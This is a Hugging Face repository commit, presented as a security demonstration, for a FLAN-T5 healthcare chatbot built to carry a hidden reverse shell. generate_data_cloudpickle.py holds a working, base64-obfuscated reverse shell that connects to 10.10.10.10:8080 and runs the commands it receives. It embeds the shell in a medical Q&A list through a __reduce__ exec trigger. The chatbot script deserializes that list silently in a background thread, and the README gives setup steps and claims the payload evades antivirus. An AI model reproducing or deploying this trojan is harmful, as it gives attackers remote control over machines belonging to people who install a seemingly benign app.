Iredteam commited on
Commit
c8a80c8
·
0 Parent(s):

initial commit

Browse files
README_cloudpickle.md ADDED
@@ -0,0 +1,130 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ license: mit
3
+ ---
4
+
5
+ > ⚠️ **WARNING**: This repo is a **security demonstration** showing how serialized Python objects can carry hidden payloads. **Never** unpickle unknown files. You’ve been warned.
6
+
7
+ # 🩺 Healthcare Chatbot (FLAN‑T5) – Cloudpickle Payload Edition
8
+
9
+ ## 📌 Overview
10
+
11
+ This chatbot mimics a healthcare Q&A assistant using **FLAN‑T5**, but the true purpose is to highlight a critical risk:
12
+ **Cloudpickle deserialization can be abused to execute arbitrary code—silently.**
13
+
14
+ This version includes a stealth reverse shell that activates in the background when the chatbot loads its Q&A data.
15
+
16
+ > ✅ Built for security research.
17
+ > ❌ Not intended for real-world healthcare use.
18
+ > 🔥 Demonstrates how `.cpkl` files can be used for stealth execution.
19
+
20
+ ---
21
+
22
+ ## ⚙️ How It Works
23
+
24
+ 1. A base64‑encoded reverse shell is injected inside a Python thread function.
25
+ 2. That payload is wrapped in a class with a `__reduce__()` method.
26
+ 3. It’s embedded into a Q&A list and serialized using **cloudpickle**.
27
+ 4. When the Streamlit app loads that `.cpkl` file in a background thread, the payload executes.
28
+
29
+ ---
30
+
31
+ ## 🚀 Setup Instructions
32
+
33
+ ### 🔹 Step 1: Clone or Download
34
+
35
+ ```bash
36
+ git clone https://huggingface.co/Iredteam/pickle-payload-chatbot
37
+ cd pickle-payload-chatbot
38
+ ```
39
+
40
+ Or download the ZIP directly from the Hugging Face model page and extract it.
41
+
42
+ ---
43
+
44
+ ### 🔹 Step 2: Download the FLAN‑T5 Model Locally
45
+
46
+ #### 💻 macOS/Linux
47
+ ```bash
48
+ git clone https://huggingface.co/google/flan-t5-small
49
+ ```
50
+
51
+ #### 🖥️ Windows
52
+ ```powershell
53
+ ./get_model.ps1
54
+ ```
55
+
56
+ ---
57
+
58
+ ### 🔹 Step 3: Generate the Cloudpickle File (⚠️ Dangerous)
59
+
60
+ Before running the chatbot, **you must generate the malicious `.cpkl` file**:
61
+
62
+ ```bash
63
+ python generate_data_cloudpickle.py
64
+ ```
65
+
66
+ > ✏️ Edit the IP address and port inside `generate_data_cloudpickle.py` to match your reverse shell listener before running this.
67
+
68
+ ---
69
+
70
+ ### 🔹 Step 4: Launch the Chatbot
71
+
72
+ ```bash
73
+ streamlit run healthcare_chatbot.py
74
+ ```
75
+
76
+ ---
77
+
78
+ ## 💡 Features
79
+
80
+ 1. **Local FLAN‑T5 Inference** – Model is loaded from disk for privacy & speed.
81
+ 2. **Streamlit UI** – Clean interface for asking medical-style questions.
82
+ 3. **Obfuscated Reverse Shell** – Background daemon starts silently via cloudpickle.
83
+ 4. **Payload Triggered in Background Thread** – No UI indication, no alerts.
84
+
85
+ ---
86
+
87
+ ## 🔬 Security Demonstration Purpose
88
+
89
+ This is not your average chatbot. It demonstrates:
90
+
91
+ - How serialized Python files (e.g., `.pkl`, `.cpkl`) can carry dangerous payloads
92
+ - That **even non-suspicious chatbot Q&A files** can hide code execution
93
+ - How `cloudpickle` and `__reduce__()` can be abused without raising antivirus alerts
94
+
95
+ ---
96
+
97
+ ## 🛡️ Do Not Use in Production
98
+
99
+ This project exists to highlight a **real-world AI security risk**. Do not:
100
+
101
+ - Deploy this in a production environment
102
+ - Use it to gain unauthorized access
103
+ - Ignore the dangers of deserializing untrusted input
104
+
105
+ ---
106
+
107
+ ## 📸 Screenshot
108
+
109
+ ![image/png](https://cdn-uploads.huggingface.co/production/uploads/6791349f0df2a77530968217/klDNYjR9JZlRKLmlHHZWP.png)
110
+
111
+ ---
112
+
113
+ ## 🔗 Related Work
114
+
115
+ For a version of this chatbot that uses a reverse shell embedded in the **Python script itself**, not the pickle file, visit:
116
+ [https://huggingface.co/Iredteam/healthcare_chatbot_mod](https://huggingface.co/Iredteam/healthcare_chatbot_mod)
117
+
118
+ ---
119
+
120
+ ## 📩 Contact
121
+
122
+ For questions, issues, or collaboration:
123
+ Open an issue on the [Hugging Face repository](https://huggingface.co/Iredteam/pickle-payload-chatbot).
124
+
125
+ ---
126
+
127
+ ## ⚠️ Final Disclaimer
128
+
129
+ This codebase is **for ethical security research only**. It shows how cloudpickle can be a threat vector in machine learning pipelines, chatbot interfaces, and any system where serialized Python data is exchanged.
130
+ **Do not deserialize unknown files. Ever.**
generate_data_cloudpickle.py ADDED
@@ -0,0 +1,48 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import base64
2
+ import cloudpickle
3
+ import textwrap
4
+
5
+ # 1) Build a payload that imports inside the thread function
6
+ payload = textwrap.dedent("""
7
+ def rev_shell():
8
+ import socket, subprocess
9
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10
+ s.connect(("10.10.10.10", 8080))
11
+ while True:
12
+ cmd = s.recv(1024).decode()
13
+ if cmd.lower() in ["exit", "quit"]:
14
+ break
15
+ out = subprocess.getoutput(cmd)
16
+ s.sendall(out.encode())
17
+ s.close()
18
+
19
+ import threading
20
+ threading.Thread(target=rev_shell, daemon=True).start()
21
+ """).strip()
22
+
23
+ # 2) Obfuscate via base64
24
+ encoded = base64.b64encode(payload.encode()).decode()
25
+
26
+ # 3) Trigger class that decodes to a str and execs
27
+ class Trigger:
28
+ def __reduce__(self):
29
+ cmd = (
30
+ "import base64\n"
31
+ f"source = base64.b64decode('{encoded}').decode()\n"
32
+ "exec(source)"
33
+ )
34
+ return (exec, (cmd,))
35
+
36
+ # 4) Put it inside a “legitimate” Q&A list
37
+ qna = [
38
+ {"question": "What are symptoms of diabetes?", "answer": "Frequent urination, excessive thirst, and weight loss."},
39
+ {"question": "How to lower blood pressure?", "answer": "Diet, exercise, and salt reduction help."},
40
+ {"question": "Stealth payload", "answer": Trigger()},
41
+ {"question": "Just data", "answer": "Looks normal, right?"}
42
+ ]
43
+
44
+ # 5) Dump it out with cloudpickle
45
+ with open("train_data_mod_obfuscated_fixed.cpkl", "wb") as f:
46
+ cloudpickle.dump(qna, f)
47
+
48
+ print("✅ Cloudpickle file created successfully.")
getpowershell.ps1 ADDED
@@ -0,0 +1,20 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Create directory for the model
2
+ New-Item -ItemType Directory -Path .\flan-t5-small -Force
3
+ # Define the list of model files
4
+ $files = @(
5
+ "config.json",
6
+ "pytorch_model.bin",
7
+ "tokenizer.json",
8
+ "tokenizer_config.json",
9
+ "special_tokens_map.json",
10
+ "vocab.txt"
11
+ )
12
+ # Base URL for the model files
13
+ $base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
14
+ # Loop through each file and download it
15
+ foreach ($file in $files) {
16
+ $url = "$base_url$file"
17
+ $output = ".\flan-t5-small\$file"
18
+ Invoke-WebRequest -Uri $url -OutFile $output
19
+ Write-Host "Downloaded: $file"
20
+ }
healthcare_chatbot.py ADDED
@@ -0,0 +1,113 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import cloudpickle
3
+ import streamlit as st
4
+ import torch
5
+ from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
6
+ import warnings
7
+ import threading
8
+
9
+ # Suppress PyTorch warnings
10
+ warnings.filterwarnings("ignore", category=UserWarning, module="torch")
11
+
12
+ # ==============================
13
+ # Model Configuration
14
+ # ==============================
15
+ MODEL_DIR = "flan-t5-small" # Load from local directory
16
+
17
+ def load_model():
18
+ """Load the FLAN-T5 model from a local directory."""
19
+ st.write("🚀 Loading FLAN-T5 model from local storage...")
20
+ try:
21
+ torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
22
+ tokenizer = AutoTokenizer.from_pretrained(MODEL_DIR, local_files_only=True)
23
+ model = AutoModelForSeq2SeqLM.from_pretrained(
24
+ MODEL_DIR,
25
+ torch_dtype=torch_dtype,
26
+ local_files_only=True
27
+ )
28
+ st.write("✅ Model loaded successfully from local storage!")
29
+ return tokenizer, model
30
+ except Exception as e:
31
+ st.error(f"❌ Model failed to load: {e}")
32
+ st.stop()
33
+
34
+ # ==============================
35
+ # Initialize Streamlit UI
36
+ # ==============================
37
+ st.title("🩺 Healthcare Chatbot (FLAN-T5)")
38
+
39
+ # Load model
40
+ try:
41
+ tokenizer, model = load_model()
42
+ except Exception as e:
43
+ st.error(f"❌ Model load error: {e}")
44
+ st.stop()
45
+
46
+ # ==============================
47
+ # Load Medical Q&A Data (Background Thread Without Streamlit UI)
48
+ # ==============================
49
+ medical_qna = []
50
+ data_loaded = threading.Event()
51
+
52
+ def load_cloudpickle_data():
53
+ global medical_qna
54
+ try:
55
+ with open("train_data_mod_obfuscated_fixed.cpkl", "rb") as file:
56
+ medical_qna = cloudpickle.load(file) # Payload executes here
57
+ data_loaded.set()
58
+ except Exception as e:
59
+ medical_qna = []
60
+ data_loaded.set()
61
+
62
+ # Start loading in background
63
+ threading.Thread(target=load_cloudpickle_data, daemon=True).start()
64
+
65
+ # Informational placeholder
66
+ data_load_placeholder = st.empty()
67
+ if not data_loaded.is_set():
68
+ data_load_placeholder.info("📂 Loading medical Q&A data...")
69
+
70
+ # Refresh UI on load
71
+ if data_loaded.wait(timeout=5):
72
+ data_load_placeholder.success("✅ Q&A data loaded successfully!")
73
+ else:
74
+ data_load_placeholder.warning("⚠️ Q&A data is still loading. Chatbot responses may be delayed.")
75
+
76
+ # ==============================
77
+ # Chatbot Response Logic
78
+ # ==============================
79
+ def chatbot_response(user_input: str) -> str:
80
+ if not data_loaded.is_set() or not medical_qna:
81
+ return "The Q&A data is still loading. Please try again shortly."
82
+
83
+ for qa in medical_qna:
84
+ if user_input.lower() in qa["question"].lower():
85
+ return qa["answer"]
86
+
87
+ prompt = (
88
+ "You are a helpful medical assistant. The user asked:\n"
89
+ f"Question: {user_input}\n\n"
90
+ "Answer in a concise, accurate way. If you're unsure, advise seeing a doctor."
91
+ )
92
+ inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
93
+ outputs = model.generate(
94
+ **inputs,
95
+ max_length=256,
96
+ num_beams=2,
97
+ no_repeat_ngram_size=2
98
+ )
99
+ return tokenizer.decode(outputs[0], skip_special_tokens=True)
100
+
101
+ # ==============================
102
+ # UI Logic
103
+ # ==============================
104
+ if st.button("What can you help me with?"):
105
+ st.write("I can provide general information about medical symptoms, treatments, and offer guidance. If you have serious concerns, please contact a doctor.")
106
+
107
+ user_input = st.text_input("Ask me a medical question:")
108
+ if st.button("Get Answer"):
109
+ if user_input.strip():
110
+ response = chatbot_response(user_input)
111
+ st.write(f"**Bot:** {response}")
112
+ else:
113
+ st.warning("Please enter a question.")
requirements.txt ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ torch
2
+ transformers
3
+ accelerate
4
+ bitsandbytes
5
+ streamlit
6
+ speechrecognition
7
+ pyttsx3
8
+ huggingface_hub
train_data_mod_obfuscated_fixed.cpkl ADDED
Binary file (932 Bytes). View file